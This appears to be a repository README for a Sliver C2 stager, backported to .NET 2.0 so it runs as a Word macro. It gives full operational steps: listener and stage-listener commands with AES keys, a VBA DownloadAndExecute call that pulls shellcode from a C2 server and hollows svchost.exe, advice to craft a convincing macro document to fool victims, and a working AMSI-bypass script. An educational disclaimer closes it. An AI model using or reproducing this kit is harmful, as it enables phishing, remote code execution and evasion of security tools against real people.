_____                              _________.__  .__                    
  /     \ _____    ___________  ____ /   _____/|  | |__|__  __ ___________ 
 /  \ /  \\__  \ _/ ___\_  __ \/  _ \\_____  \ |  | |  \  \/ // __ \_  __ \
/    Y    \/ __ \\  \___|  | \(  <_> )        \|  |_|  |\   /\  ___/|  | \/
\____|__  (____  /\___  >__|   \____/_______  /|____/__| \_/  \___  >__|   
        \/     \/     \/                    \/                    \/       
                                    Macro Fishing with Sliver C2

Backport of SliverLoader DLL, wellknown through Ycf-Kel Powershell Stager for Sliver Shellcode, from .net4 Framework to .net2 to make it usable as assembly in vba scripts generated by DotNetToJScript.

If you want to generate VBA scripts with DotNetToJScript, the assembly must be built with .NET Framework version 2.0 to reference class methods through Visual Basic. The assembly from the stager built by Ycf-Kel was written for .NET Framework v4.7 and thus could not be used as a drop-in assembly. This is because Office pre-loads a core DLL into memory before the script runs, which forces the loaded Common Language Runtime (CLR) to always be version 2.0 to access methods from invoked assemblies.

A workaround for this issue is to use the ActCtx object with a custom manifest to load version 4.0 classes into VBA, even though its CLR is set to version 2.0. However, I decided against this approach and instead backported the code to .NET Framework 2.0.

Features

The stager retains the same features as the original:

• Raw Shellcode
• Compression for the second stage using deflate9 or gzip
• AES Encryption
• TLS through Self-Signed SSL
• Process Hollowing
• Reflection to avoid disk artifacts
• No hardcoded parameters
• Compatible with both 32-bit and 64-bit Office
• Serializable with DotNetToJScript

Usage

Setup Sliver C2

Follow the installation guide on the (wiki page)[https://sliver.sh/docs?name=Linux+Install+Script] to install Sliver C2

When the setup is complete, a profile is created first, followed by the initiation of a listener with a self-signed certificate to encrypt the transport. Finally, a stage listener is instantiated. The choice of how to create the certificate is yours; you just need a .key and a .crt file to pass to the listener. You can generate these files using Metasploit's “auxiliary/gather/impersonate_ssl” module on "random.com" for more obfuscation, or you can create a self-signed certificate.

• Setup the profile

profiles new -b  https://192.168.X.X:443 --format shellcode --arch x86 lab
# --arch either x86 or amd64 depending on the office version (most probably x86).
# lab is the name of the profile. you can use any name you want.
# -b for specifying HTTPS as the protocol.

• To start the listener, you need to specify the same port, IP address, and protocol that were used when creating the profile. Use the SSL certificate and key generated earlier by passing the .crt and .key files

https -L 192.168.X.X -l 443 -c /tmp/crt.crt -k /tmp/key.key

• Finally, use the stage-listener command to launch the staging server. Specify port 8080 with the HTTPS protocol. Use the same SSL certificate and key as for the listener. Additionally, specify the compression algorithm and the AES encryption keys as follows.

stage-listener --url https://192.168.X.X:8080 --profile lab -c /tmp/crt.crt -k /tmp/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV 
# -C deflate9, gzip or no compression is supported.
# --profile must match the created profile name.
# --aes-encrypt-key The key used for the encription.
# --aes-encrypt-iv The injection vector.

This will result in two jobs running on ports 443 and 8080, both with TLS enabled.

Macro Usage

The file macrosliver.vba contains the VBA code that is directly usable in Word. Create a .docm file with convincing text to prompt the victim to enable macro execution, ensuring that the Run() function is triggered, for example, by calling it in the Auto_Open() trigger or a similar method, to catch the session with the instantiated listener. When the VBA function is executed, it deserializes the embedded stager DLL and invokes it. After that, the functions of the loader class can be called using the object o.

    Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
    o.DownloadAndExecute "https://192.168.X.X:8080/hello.woff", "svchost.exe", "deflate9", "D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT", "8y/B?E(G+KbPeShV"

The arguments to pass are:

1. The stage listener URL where the shellcode is hosted.
2. The binary into which the process should be injected.
3. The compression algorithm: either deflate9, gzip, or an empty string if no compression was chosen when the listener was created.
4. The AES key.
5. The AES initialization vector.

Build the assembly

The assembly can also be built by yourself if additional functionality is needed or if further obfuscation and AMSI bypass are required. To do this, open the solution file and build the integrated MacroSliver Project. It has to be built for the Any CPU configuration and does not need to be specified for a particular architecture. This allows the stage listener to provide the correct architecture for the target Office version.

The changes to the original stager include the handling of decompression in .NET v2 compared to .NET v4 and the AES decryption class. Additionally, VBA passes all parameters as strings rather than byte arrays, as in the original stager. So the aes key and iv are passed as strings.

After the assembly has been built, it can be used to create a VBA, HTA, or JScript script with DotNetToJScript.

Create the Script

To generate the VBA script using DotNetToJScript, follow these steps:

1. Build DotNetToJScript: Clone and build the DotNetToJScript project from (GitHub)[https://github.com/tyranid/DotNetToJScript].
2. Prepare the necessary files: Copy the DotNetToJScript.exe, NDesk.Options.dll (created during the build process), and MacroSliver.dll into the same folder.
3. Execute the command: Run the following command to generate the VBA script.

Here are the detailed steps:

Step 1: Build DotNetToJScript

1. Clone the DotNetToJScript repository:

git clone https://github.com/tyranid/DotNetToJScript.git

2. Navigate to the DotNetToJScript directory and build the project:

cd DotNetToJScript
msbuild /p:Configuration=Release

Step 2: Prepare the Files

1. Copy DotNetToJScript.exe and NDesk.Options.dll from the build output directory (usually bin\Release) to a new folder.
2. Copy your MacroSliver.dll to the same folder.

Step 3: Execute the Command

1. Open a command prompt in the folder containing DotNetToJScript.exe, NDesk.Options.dll, and MacroSliver.dll.
2. Run the following command to generate the VBA script:

.\DotNetToJScript.exe .\MacroSliver.dll --lang=vba --ver=v2 -c=Loader -o macrosliver.vba

This command will create a macrosliver.vba file that contains the VBA script generated from the MacroSliver.dll. Finally add the call of DownloadAndExecute to trigger the stager instantiation.

    o.DownloadAndExecute "https://192.168.X.X:8080/hello.woff", "svchost.exe", "deflate9", "D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT", "8y/B?E(G+KbPeShV"

JScript

You can also create JScript payloads to deliver the dll via java script. Follow allong but transfer the methodolgy to JS. I believe you are smart enough to figure out how to do.

AMSI Bypass

Bypassing AMSI highly reduces the detection rate, but DN2JS doesn't provide one natively. So, you can add the below AMSI bypass to your output JScript payloads much like I've done to the examples I've included in this repo.

NOTE: You must do the bypass after the setversion() method runs or your payload will break. Credit: rxwx/bypass.js (although its a pretty well-known bypass)

// 4MS7_BYP455
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";

try{
	var AmsiEnable = sh.RegRead(key);
	if(AmsiEnable!=0){
	throw new Error(1, '');
	}
}catch(e){
	sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
	sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
	sh.RegWrite(key, 1, "REG_DWORD"); // put it back
	WScript.Quit(1);
}

Sometimes the AMSI bypass itself is what gets your payload flagged so feel free to play around with it.

Disclaimer

WARNING: This repository contains malware and potentially harmful code. It is intended for educational purposes only.

Important Information

Purpose: The contents of this repository are provided for research and educational purposes only. The goal is to help security professionals, researchers, and students understand malware, its behavior, and methods to detect and mitigate it.

Legal Use: You are strictly prohibited from using any code or information from this repository for malicious purposes or illegal activities. Unauthorized use of this material to cause harm, breach security, or compromise systems is against the law and strictly forbidden.

Responsibility: The authors and contributors of this repository do not take any responsibility for any damage or harm caused by the use or misuse of the content provided herein. Users are fully responsible for their actions and must comply with all applicable laws and regulations.

Safe Environment: Always use a controlled, isolated, and safe environment, such as a virtual machine or sandbox, when testing or experimenting with the code in this repository. Ensure that your testing environment is disconnected from any networks to prevent unintended spread or damage.

Ethical Use: This repository aims to promote ethical hacking, cybersecurity awareness, and the development of effective defenses against malware. By using this repository, you agree to adhere to ethical guidelines and use the content responsibly.

Acknowledgment

By accessing, cloning, or using any part of this repository, you acknowledge that you have read, understood, and agree to this disclaimer. You also acknowledge that you will use the information responsibly and ethically.

If you do not agree with the terms outlined above, do not access or use the contents of this repository.